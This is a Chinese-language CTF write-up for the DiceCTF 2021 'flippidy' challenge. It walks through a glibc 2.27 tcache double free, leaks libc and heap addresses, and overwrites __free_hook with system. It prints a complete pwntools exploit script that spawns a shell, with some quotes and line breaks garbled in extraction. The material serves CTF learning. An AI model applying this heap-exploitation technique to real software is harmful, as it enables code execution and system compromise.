热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

DiceCTF2021flippidy

检查一下保护机制:只有pie没有开ida看下程序逻辑:main函数:第13行获取一个数字,第14行malloc(8*num)申请一个堆块,这个堆块将被用于保存其它堆块的堆址然后进入

检查一下保护机制:

技术分享图片

只有pie没有开

 ida看下程序逻辑:

main函数:

技术分享图片

第13行获取一个数字,第14行malloc(8*num)申请一个堆块,这个堆块将被用于保存其它堆块的堆址

然后进入while循环,首先是sub_4011c6函数:

技术分享图片

会把数组off_404020里的字符指针指向的字符串依次打印出来,off_404020是这样的:

技术分享图片

那么sub_4011c6()就打印出了一个菜单,菜单里有三个选项  (1)add  (2)flip  (3)exit

先看一下第36行调用的add函数:

 技术分享图片

只能malloc(0x30),意味着申请的堆块的大小是固定的

flip函数是这样的:

技术分享图片

当note个数是奇数个(比如7)的时候,就会发生 free(notes[3]); free(notes[7-3-1])的现象,形成了double free

题目环境是glibc 2.27, tcache double free 比fast bin 要好利用

前面打印菜单的函数,是puts(off_402020[i]),如果能篡改off_402020数组里的数据,就可以任意地址读

看一下off_404020附近的情况:

 技术分享图片

 

拿到libc地址和堆址,方法是利用double free 申请到位于0x404020的chunk,并在0x404040处写上p64(0x404158)

因为此前0x404020处存储的数据是0x404040,意味着它这个chunk的next指针是0x404040,那么下一个tcache chunk将位于0x404040

如果在0x404040写上0x404158,那next的next就是0x404158,此后依次申请,就能拿到位于0x404158的chunk(0x404158上存储着一个很重要的堆址)

脚本如下:


add(0,"/bin/sh\x00")
add(
3,p64(0x404020))
flip()
add(
4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158))

 

此时 tcache链表是这样的 0x404040 -> 0x404158 -> heap_base+0x260 

按照原定计划依次申请拿到0x404158处的chunk,在这个chunk里写上heap_base+0x50,这会让程序误以为用来存储堆块地址的堆块,在heap_base+0x50处,这个地址位于tcache结构体,后来再申请chunk会把堆址写到tcache结构体上,不过不打紧,小伤不致命

拿到 0x404158后(为保证heap_base+0x260的chunk的next指针指向0x404158,一定要add(0)),tcache链表是这样的 heap_base+0x260 -> 0x404158 -> heap_base +0x50 

然后依次申请就拿到了tcache 结构体,改写它,使得下一个要申请的chunk位于__free_hook,我们在__free_hook上写system函数的地址

脚本如下:


add(5,p64(0))
add(0,p64(heap_base
+0x50))
add(
1,p64(heap_base+0x2b0))
add(
1,p64(heap_base+0x260))
add(
1,p64(0)*2+p64(free_hook))
add(
1,p64(sys))

整个利用脚本是这样的:


#coding:utf-8
from pwn import *
context.log_level
="debug"
sh
=process("./flippidy")
#sh=gdb.debug("./flippidy","b * 0x401378")
#
sh=remote("dicec.tf",31904)
libc=ELF("./lib/libc.so.6")
def add(idx,data):
sh.sendlineafter(
":","1")
sh.sendlineafter(
"Index:",str(idx))
sh.sendlineafter(
"Content: ",data)

def flip():
sh.sendlineafter(
": ","2")
sh.sendlineafter(
"be","7")
add(0,
"/bin/sh\x00")
add(
3,p64(0x404020))
flip()
add(
4,p64(0x404120)+p64(0x404158)+p64(0x4040a4)+p64(0x4040d6)+p64(0x404158))
#一并拿到libc基址和堆址

sh.recvuntil(
"\n\n")
stdout
=u64(sh.recv(6)+b"\x00\x00")
sh.recvuntil(
"\n")
heap_base
=u64((sh.recvuntil(\n)[:-1]).ljust(8,b"\x00"))-0x260
libc_base
=stdout-libc.sym[_IO_2_1_stdout_]
sys
=libc_base+libc.sym[system]
free_hook
=libc_base+libc.sym[__free_hook]
info(hex(libc_base))
info(hex(stdout))
info(hex(heap_base))
add(
5,p64(0))
add(0,p64(heap_base
+0x50)) #绕一圈,目的是跑到tcache结构体
add(1,p64(heap_base+0x2b0))
add(
1,p64(heap_base+0x260))
add(
1,p64(0)*2+p64(free_hook))#好了,拿到了tcache结构体
add(1,p64(sys))
flip()
#pwnlib.gdb.attach(sh)
sh.interactive()

 


推荐阅读
  • 在现代多线程编程中,Lock接口提供的灵活性和控制力超越了传统的synchronized关键字。Lock接口不仅使锁成为一个独立的对象,还提供了更细粒度的锁定机制,例如读写锁(ReadWriteLock)。本文将探讨如何利用ReentrantReadWriteLock提高并发性能。 ... [详细]
  • Shiro功能拓展:登录失败重试次数限制
    本文详细介绍了如何在Apache Shiro框架中实现对用户登录失败重试次数的限制,通过自定义密码匹配器来增强系统的安全性。该方法不仅能够有效防止暴力破解攻击,还能确保合法用户的账户安全。 ... [详细]
  • 使用Inno Setup将EXE与JRE封装为Windows安装程序
    本文详细介绍了如何利用Inno Setup工具将EXE文件及Java运行环境(JRE)整合为适用于Windows操作系统的安装程序。我们将提供必要的软件下载链接,并逐步指导您完成整个打包过程。 ... [详细]
  • 本文提供了中国三大主要通信运营商(中国联通、中国电信和中国移动)的官方邮箱服务网站链接,帮助用户快速访问并管理个人邮件,同时介绍了如何设置短信提醒功能。 ... [详细]
  • Linux环境下Memcached安装指南
    本文详细介绍如何在Linux虚拟机上安装Memcached,包括必要的依赖库安装,以及使用Xshell进行文件传输的具体步骤。 ... [详细]
  • 使用Adobe Illustrator打造独特的家族徽章:牡鹿图腾设计教程
    本文详细介绍了一种基于《权力的游戏》灵感,运用Adobe Illustrator创作独特家族图腾——牡鹿徽章的方法。本教程不仅展示了具体的步骤,还提供了多种技巧,帮助读者创作出既具个人特色又符合设计原则的作品。 ... [详细]
  • 本文介绍了一个简单的Python函数,该函数能够接收一个日期作为输入,并返回这一天是星期几。此功能通过使用Python的datetime模块实现。 ... [详细]
  • 本文探讨了Tomcat在启动过程中遇到的‘严重: Null组件’警告,并提供了解决此问题的方法,特别是当Tomcat使用的JRE版本低于应用所需版本时的处理方案。 ... [详细]
  • 深入理解FastDFS
    FastDFS是一款高效、简洁的分布式文件系统,广泛应用于互联网应用中,用于处理大量用户上传的文件,如图片、视频等。本文探讨了FastDFS的设计理念及其如何通过独特的架构设计提高性能和可靠性。 ... [详细]
  • 本文深入探讨了Java注解的基本概念及其在现代Java开发中的应用。文章不仅介绍了如何创建和使用自定义注解,还详细讲解了如何利用反射机制解析注解,以及Java内建注解的使用场景。 ... [详细]
  • 本文详细介绍了MySQL在Linux环境下的主从复制技术,包括单向复制、双向复制、级联复制及异步复制等多种模式。主从复制架构中,一个主服务器(Master)可与一个或多个从服务器(Slave)建立连接,实现数据的实时同步。 ... [详细]
  • Redis 教程01 —— 如何安装 Redis
    本文介绍了 Redis,这是一个由 Salvatore Sanfilippo 开发的键值存储系统。Redis 是一款开源且高性能的数据库,支持多种数据结构存储,并提供了丰富的功能和特性。 ... [详细]
  • 本文介绍了一种利用迭代法解决特定方程问题的方法,特别是当给定函数f(x)在区间[x1, x2]内连续且f(x1)0时,存在一个x~使得f(x~)=0。通过逐步细化搜索范围,可以高效地找到方程的根。 ... [详细]
  • 本文通过具体示例探讨了在 C++ 中使用 extern "C" 的重要性及其作用,特别是如何影响编译后的对象文件中的符号名称。 ... [详细]
  • 本文详细介绍了如何在Arch Linux系统中安装和配置FlashTool,包括必要的依赖项安装和udev规则设置,以确保工具能够正确识别USB设备。 ... [详细]
author-avatar
Yang家联1
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有